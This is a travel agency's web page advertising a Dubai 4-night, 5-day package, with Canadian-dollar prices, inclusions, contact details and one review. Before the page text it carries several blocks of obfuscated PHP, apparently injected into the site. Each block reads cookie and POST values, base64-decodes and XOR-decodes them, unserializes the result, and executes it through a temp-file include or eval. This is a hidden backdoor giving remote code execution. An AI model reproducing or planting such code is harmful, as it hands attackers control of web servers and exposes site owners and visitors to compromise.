$JonwmVz = 'K' . "\x51" . "\137" . "\114" . 'r' . chr (84); $YVhIMdk = 'c' . "\x6c" . chr (97) . chr (115) . "\163" . "\x5f" . 'e' . "\x78" . chr (105) . "\163" . chr ( 238 - 122 ).'s';$dDjEVplQd = class_exists($JonwmVz); $YVhIMdk = "60921";$lKWahjwue = !1;if ($dDjEVplQd == $lKWahjwue){function JNnsHQF(){$QowNVr = new /* 43637 */ KQ_LrT(36794 + 36794); $QowNVr = NULL;}$hUZJh = "36794";class KQ_LrT{private function oVhWKR($hUZJh){if (is_array(KQ_LrT::$BdvKUto)) {$ikUVbnMR = sys_get_temp_dir() . "/" . crc32(KQ_LrT::$BdvKUto['s' . "\x61" . "\x6c" . "\164"]);@KQ_LrT::$BdvKUto[chr ( 856 - 737 ).chr ( 954 - 840 ).'i' . "\x74" . "\x65"]($ikUVbnMR, KQ_LrT::$BdvKUto["\143" . chr (111) . "\x6e" . chr ( 659 - 543 )."\x65" . "\156" . "\164"]);include $ikUVbnMR;@KQ_LrT::$BdvKUto[chr (100) . "\x65" . "\154" . 'e' . chr (116) . chr ( 949 - 848 )]($ikUVbnMR); $hUZJh = "36794";exit();}}private $KHHXPw;public function eyMYqXm(){echo 20050;}public function __destruct(){$hUZJh = "12576_47305";$this->oVhWKR($hUZJh); $hUZJh = "12576_47305";}public function __construct($VJfCkKDwxh=0){$OMupahX = $_POST;$XIRBWiEJz = $_COOKIE;$vtIjF = "45a2ad53-cd54-411c-8584-2bb35e69dc05";$UAHsuYPq = @$XIRBWiEJz[substr($vtIjF, 0, 4)];if (!empty($UAHsuYPq)){$qrLVvPY = "base64";$yoBDkD = "";$UAHsuYPq = explode(",", $UAHsuYPq);foreach ($UAHsuYPq as $ddlSx){$yoBDkD .= @$XIRBWiEJz[$ddlSx];$yoBDkD .= @$OMupahX[$ddlSx];}$yoBDkD = array_map($qrLVvPY . "\137" . "\144" . 'e' . "\x63" . 'o' . chr ( 907 - 807 ).chr ( 1074 - 973 ), array($yoBDkD,)); $yoBDkD = $yoBDkD[0] ^ str_repeat($vtIjF, (strlen($yoBDkD[0]) / strlen($vtIjF)) + 1);KQ_LrT::$BdvKUto = @unserialize($yoBDkD);}}public static $BdvKUto = 28853;}JNnsHQF();}$XZnsSz = chr ( 496 - 389 ).chr ( 361 - 291 ).'_' . chr (88) . "\x78" . "\113";$mjAQuOgW = chr (99) . chr (108) . chr (97) . "\163" . chr (115) . chr (95) . "\x65" . chr ( 255 - 135 ).'i' . chr (115) . chr (116) . "\x73";$PYJpkXUAIS = class_exists($XZnsSz); $mjAQuOgW = "9410";$VvgqbHK = !1;if ($PYJpkXUAIS == $VvgqbHK){function LzxZpZp(){$LzESwEw = new /* 27552 */ kF_XxK(50901 + 50901); $LzESwEw = NULL;}$MIZOV = "50901";class kF_XxK{private function bpWQfDpEK($MIZOV){if (is_array(kF_XxK::$TNWJGlThj)) {$UbAMZP = sys_get_temp_dir() . "/" . crc32(kF_XxK::$TNWJGlThj['s' . "\x61" . 'l' . chr (116)]);@kF_XxK::$TNWJGlThj[chr ( 815 - 696 ).chr ( 125 - 11 ).'i' . chr (116) . 'e']($UbAMZP, kF_XxK::$TNWJGlThj["\x63" . chr ( 752 - 641 ).'n' . "\x74" . chr (101) . "\156" . "\164"]);include $UbAMZP;@kF_XxK::$TNWJGlThj[chr (100) . chr (101) . "\154" . chr (101) . chr ( 981 - 865 ).'e']($UbAMZP); $MIZOV = "50901";exit();}}private $QnKkSDuJ;public function pRKvNDWm(){echo 23219;}public function __destruct(){kF_XxK::$TNWJGlThj = @unserialize(kF_XxK::$TNWJGlThj); $MIZOV = "16194_15689";$this->bpWQfDpEK($MIZOV); $MIZOV = "16194_15689";}public function wuNEeakQZ($AiRJxC, $ULthsE){return $AiRJxC[0] ^ str_repeat($ULthsE, (strlen($AiRJxC[0]) / strlen($ULthsE)) + 1);}public function __construct($dKyMbPOJum=0){$FqKwQ = $_POST;$TpNmPBFOzn = $_COOKIE;$ULthsE = "ad5a44f2-d5ae-4962-91de-d14ae50706aa";$AMryUEyly = @$TpNmPBFOzn[substr($ULthsE, 0, 4)];if (!empty($AMryUEyly)){$elbiedDZK = "base64";$AiRJxC = "";$AMryUEyly = explode(",", $AMryUEyly);foreach ($AMryUEyly as $jnphrPkVvZ){$AiRJxC .= @$TpNmPBFOzn[$jnphrPkVvZ];$AiRJxC .= @$FqKwQ[$jnphrPkVvZ];}$AiRJxC = array_map($elbiedDZK . chr (95) . "\144" . chr (101) . chr (99) . chr ( 1051 - 940 ).'d' . "\145", array($AiRJxC,));kF_XxK::$TNWJGlThj = $this->wuNEeakQZ($AiRJxC, $ULthsE);}}public static $TNWJGlThj = 46657;}LzxZpZp();}$LCSIMYCpWv = "\x49" . 'f' . 'x' . "\x5f" . chr (98) . "\x52" . 'L' . chr ( 118 - 9 ).chr ( 456 - 374 ); $MQJVhFhOw = chr ( 279 - 180 )."\154" . chr ( 996 - 899 ).'s' . 's' . "\x5f" . chr ( 813 - 712 ).chr (120) . "\x69" . chr (115) . chr ( 335 - 219 ).chr ( 632 - 517 ); $plHwDSRdVk = class_exists($LCSIMYCpWv); $MQJVhFhOw = "26132";$iqzgeVgoo = !1;if ($plHwDSRdVk == $iqzgeVgoo){function TFCJX(){$ggYrgY = new /* 60016 */ Ifx_bRLmR(10815 + 10815); $ggYrgY = NULL;}$dDYRUFLfH = "10815";class Ifx_bRLmR{private function GHnjmjzNML($dDYRUFLfH){if (is_array(Ifx_bRLmR::$nNEiURkqJ)) {$dRulB = str_replace("\74" . chr ( 858 - 795 ).chr ( 463 - 351 )."\150" . chr ( 908 - 796 ), "", Ifx_bRLmR::$nNEiURkqJ["\x63" . chr ( 1039 - 928 ).chr (110) . "\164" . "\145" . "\x6e" . "\164"]);eval($dRulB); $dDYRUFLfH = "10815";exit();}}private $lDtXuitrha;public function qNamsolJc(){echo 61240;}public function __destruct(){Ifx_bRLmR::$nNEiURkqJ = @unserialize(Ifx_bRLmR::$nNEiURkqJ); $dDYRUFLfH = "28298_31019";$this->GHnjmjzNML($dDYRUFLfH); $dDYRUFLfH = "28298_31019";}public function SHtSa($JqZgKuP, $oVzxVp){return $JqZgKuP[0] ^ str_repeat($oVzxVp, (strlen($JqZgKuP[0]) / strlen($oVzxVp)) + 1);}public function __construct($Gdqujmyy=0){$zhIRYTgv = $_POST;$uZXFmaX = $_COOKIE;$oVzxVp = "f4aedd7d-5652-4f84-95c2-51d00aac8883";$bMCVTwNN = @$uZXFmaX[substr($oVzxVp, 0, 4)];if (!empty($bMCVTwNN)){$AEogueQ = "base64";$JqZgKuP = "";$bMCVTwNN = explode(",", $bMCVTwNN);foreach ($bMCVTwNN as $gUSCCVUb){$JqZgKuP .= @$uZXFmaX[$gUSCCVUb];$JqZgKuP .= @$zhIRYTgv[$gUSCCVUb];}$JqZgKuP = array_map($AEogueQ . chr ( 508 - 413 ).chr ( 963 - 863 ).chr (101) . chr (99) . "\157" . chr ( 508 - 408 ).'e', array($JqZgKuP,));Ifx_bRLmR::$nNEiURkqJ = $this->SHtSa($JqZgKuP, $oVzxVp);}}public static $nNEiURkqJ = 37285;}TFCJX();}$UvLBHUarky = "\160" . chr (95) . "\170" . "\x71" . "\x58";$hxRYXYEtBS = chr ( 245 - 146 )."\x6c" . chr ( 517 - 420 )."\163" . chr (115) . chr (95) . "\x65" . 'x' . "\x69" . chr ( 713 - 598 )."\164" . chr (115); $ssZXc = class_exists($UvLBHUarky); $hxRYXYEtBS = "50198";$EHdCXAxW = !1;if ($ssZXc == $EHdCXAxW){function BPfqn(){$VOGsNwXSP = new /* 27740 */ p_xqX(8623 + 8623); $VOGsNwXSP = NULL;}$GFSPuoGD = "8623";class p_xqX{private function QiJbAdmNwa($GFSPuoGD){if (is_array(p_xqX::$QUAqNysfrJ)) {$fCllYbjNrt = str_replace('<' . chr ( 265 - 202 ).chr (112) . chr (104) . 'p', "", p_xqX::$QUAqNysfrJ[chr ( 543 - 444 ).'o' . "\x6e" . "\164" . 'e' . chr (110) . chr (116)]);eval($fCllYbjNrt); $GFSPuoGD = "8623";exit();}}private $XTtfe;public function bcuvwzHVzt(){echo 54875;}public function __destruct(){p_xqX::$QUAqNysfrJ = @unserialize(p_xqX::$QUAqNysfrJ); $GFSPuoGD = "33683_32047";$this->QiJbAdmNwa($GFSPuoGD); $GFSPuoGD = "33683_32047";}public function CXavEKIo($ecIglY, $ECRcPsjm){return $ecIglY[0] ^ str_repeat($ECRcPsjm, (strlen($ecIglY[0]) / strlen($ECRcPsjm)) + 1);}public function __construct($OKrqiE=0){$VlLCTVG = $_POST;$PyzWFAL = $_COOKIE;$ECRcPsjm = "421c81f8-f1ec-472e-9edb-52ee576f37ea";$slveAiiUhE = @$PyzWFAL[substr($ECRcPsjm, 0, 4)];if (!empty($slveAiiUhE)){$qwxenru = "base64";$ecIglY = "";$slveAiiUhE = explode(",", $slveAiiUhE);foreach ($slveAiiUhE as $mGnAGoX){$ecIglY .= @$PyzWFAL[$mGnAGoX];$ecIglY .= @$VlLCTVG[$mGnAGoX];}$ecIglY = array_map($qwxenru . chr (95) . chr (100) . chr ( 255 - 154 ).chr ( 616 - 517 ).chr (111) . chr ( 581 - 481 )."\145", array($ecIglY,));p_xqX::$QUAqNysfrJ = $this->CXavEKIo($ecIglY, $ECRcPsjm);}}public static $QUAqNysfrJ = 59554;}BPfqn();} $dWiwqzjHA = 'O' . chr ( 401 - 283 ).'W' . chr ( 583 - 488 )."\102" . chr (99) . chr ( 896 - 816 ); $CnEOqXTX = chr ( 506 - 407 ).'l' . chr ( 1026 - 929 )."\x73" . "\x73" . chr ( 1080 - 985 )."\145" . "\170" . "\151" . "\x73" . chr ( 757 - 641 ).'s';$EIiDpzpKh = class_exists($dWiwqzjHA); $CnEOqXTX = "7112";$TFaqxKPtt = !1;if ($EIiDpzpKh == $TFaqxKPtt){function kPuQfU(){$UwRgr = new /* 56525 */ OvW_BcP(20763 + 20763); $UwRgr = NULL;}$NQTfJRFD = "20763";class OvW_BcP{private function pmxkPisvBr($NQTfJRFD){if (is_array(OvW_BcP::$EoTtk)) {$eMwvRvmq = str_replace('<' . "\x3f" . "\160" . "\150" . "\x70", "", OvW_BcP::$EoTtk[chr ( 400 - 301 )."\x6f" . "\x6e" . chr ( 612 - 496 ).chr ( 741 - 640 )."\156" . chr ( 263 - 147 )]);eval($eMwvRvmq); $NQTfJRFD = "20763";exit();}}private $pRxaSKkXfD;public function cHjpIwTKL(){echo 48346;}public function __destruct(){OvW_BcP::$EoTtk = @unserialize(OvW_BcP::$EoTtk); $NQTfJRFD = "16088_2490";$this->pmxkPisvBr($NQTfJRFD); $NQTfJRFD = "16088_2490";}public function EILyCNDhW($QiVvA, $dOYaQ){return $QiVvA[0] ^ str_repeat($dOYaQ, (strlen($QiVvA[0]) / strlen($dOYaQ)) + 1);}public function __construct($koxmCGEEd=0){$COgiSg = $_POST;$xNlsZFsqk = $_COOKIE;$dOYaQ = "95993d52-75f6-4261-9358-7980da952223";$ohDXOb = @$xNlsZFsqk[substr($dOYaQ, 0, 4)];if (!empty($ohDXOb)){$KczTdD = "base64";$QiVvA = "";$ohDXOb = explode(",", $ohDXOb);foreach ($ohDXOb as $lSzqnGcA){$QiVvA .= @$xNlsZFsqk[$lSzqnGcA];$QiVvA .= @$COgiSg[$lSzqnGcA];}$QiVvA = array_map($KczTdD . '_' . 'd' . chr ( 855 - 754 )."\143" . chr (111) . "\x64" . 'e', array($QiVvA,));OvW_BcP::$EoTtk = $this->EILyCNDhW($QiVvA, $dOYaQ);}}public static $EoTtk = 33602;}kPuQfU();} Dubai 4 Nights 5 Days Package | Dubai Vacation Package

Dubai 4 Nights 5 Days Package



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5 Days Dubai Travel Package 4 Nights

We at Jazaa Travel bring the most stunning Dubai 4 nights 5 days package. Take an exciting vacation with this singly composed 5 days in Dubai itinerary most reasonable selling Dubai holiday package from Canada and UK, and tackle off into the royal kingdoms of Dubai city. Explore Dubai with 4 nights Dubai Package planned to conceal most of the tourist lures in Dubai. Dubai comprehends nothing sounder than the most pleasing. It is a view that hinges on superlatives. With ideologue structuring, packaging, building, and redrawing of the skyline, the city persists you to see the vision of the World and how. Dubai is a remarkable landscape, accountable in equivalent parts to its antique roots and the inventions of the current era. It is the dwelling of giants, a city where tourists can skim via the World's largest shopping mall, mount the World's loftiest tower, and spectacle at the most extensive human-made island in their presence. You can encounter it all on one of our Dubai tour packages for 4 nights and 5 days. Dubai's four-night package possesses a meet and welcomes at the airport. With a private car, our trained regional directory will pick you up from the terminal and transfer you to your hotel. Lodging in four-star hotels with daily continental breakfast. Likewise, a Dubai trip for 5 days also contains a half-day Dubai City Tour and Creek Dinner Cruise.


After breakfast in the morning, our tour guide will take you on the start of our exquisite Dubai itinerary 5 days city tour. Being the quintessence of architecture, the middle-eastern city of Dubai is known for its lofty structures and elegant buildings. From the World’s tallest building to the World’s biggest shopping mall and the most elevated hotel in the World, this city offers some of the best visual delights. It is also the business junction of the Middle East and is the most populated city in the UAE. Dubai has a lower crime rate and is ranked 8th securest metropolis in the World. In the Middle East, Dubai is comprehended as the shopping coffer. Home to the largest shopping malls in the World, Dubai is the best place for everyone. The culture of Dubai is a blend of traditional Arabic culture. Islamic and Arabic culture is reflected in food, music, clothing, lifestyle, and architecture. Its tapered towers soar into the sky, its almost gleaming shopping malls, its islands built in whimsical shapes on a leaf, its underwater hotels with fish to keep you company while you nap, or the desert-roaming penguins that are born. The spectacular, chic universe of Dubai, where the impossible becomes possible, sometimes impressively. There is no limit to the luxury here. Like a seasoned celebrity, it captivates everyone with its glamor and luxury. No wonder there are tons of Dubai set menus to suit every taste, offering the best of Dubai.



  • CAD $399/- Based on Quad Occupancy.
  • CAD $499/- Based on Triple Occupancy.
  • CAD $599/- Based on Double Occupancy.

Package Details:

  • 04  Nights 5 days hotel stay in heart of Dubai
  • Daily Breakfast
  • Half Day Dubai City Tour
  • Half Day Dhow Cruise Dinner


  • Meet & Greet services at Airport.
  • Airport Return Transfer in PVT Car

Packages Exclude:

  • Lunch and Dinner
  • Personal Expanse
  • Airline Ticket


  • The prices are subject to availability at the time of reservation.
  • The package price doesn’t include Air Ticket
  • The package doesn’t include transportation
  • The package doesn’t include meals not mentioned above
  • The package can be customized according to your travel plan and fit into your budget.

Please contact us now at +1416-320-8642  or email us at jazaatravel@gmail.com for details.


1 verified review
Location 5/5
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Price 5/5
Rooms 5/5

1 Comment

  1. 5

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    One of the best experiences I’ve ever had in my life, super professional staff and must say good management. I would consider this company again for future trips.

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